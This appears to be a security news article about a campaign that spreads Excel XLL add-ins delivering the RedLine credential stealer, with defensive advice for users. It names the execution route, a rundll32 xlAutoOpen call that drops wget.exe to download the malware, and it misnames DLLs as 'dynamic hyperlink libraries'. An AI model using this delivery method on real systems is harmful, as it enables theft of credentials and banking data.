Threat actors are spreading Excel XLL files that download and install the RedLine password and information-stealing malware via website contact forms and discussion forums.
RedLine is a credential-theft malware that steals cookies, user names and passwords, and banking details stored in web browsers, as well as FTP credentials and files from a compromised device.
The malware can also implement commands, download and operate further malware, and take screenshots of the active Windows screen. The stolen data is sent back to the hackers to be sold on the dark web or used for other malicious activities.
The XLL files are identical to dynamic hyperlink libraries (DLLs), with the addition of an ‘xlAutoOpen’ option run by Excel. This function (an add-in, basically) allows Excel to read and write data, import it from other sources, design custom functions and perform multiple tasks.
However, if the DLL is implemented manually via regsvr32.exe command or the 'rundll32 name.xll, xlAutoOpen' command will extract the wget.exe program to the %UserProfile% folder and use it to download the RedLine binary from a remote site.
Once the malware is installed by the victim, it will look out for valuable information to steal, including credentials and credit cards stored in the Chrome, Edge, Firefox, Brave, and Opera browsers.
Therefore, if you receive an email or other message distributing these types of files, simply delete the message and report it as spam.
As XLL files are executables, threat actors can use them to perform a variety of malicious behavior on a device. Users should be careful when receiving these files and should make sure they are getting the files from a trusted source before proceeding and opening them.
According to security experts, XLL files are rarely sent as attachments but instead installed through another program or via your Windows admin. Thus, any such file that comes in the mail should be handled with extra precaution.
Aside from being vigilant with attachments and links in emails, users should also make sure to keep their endpoints secure with strong and refreshed passwords, as well as that their system runs safeguards, such as antivirus solutions and firewalls.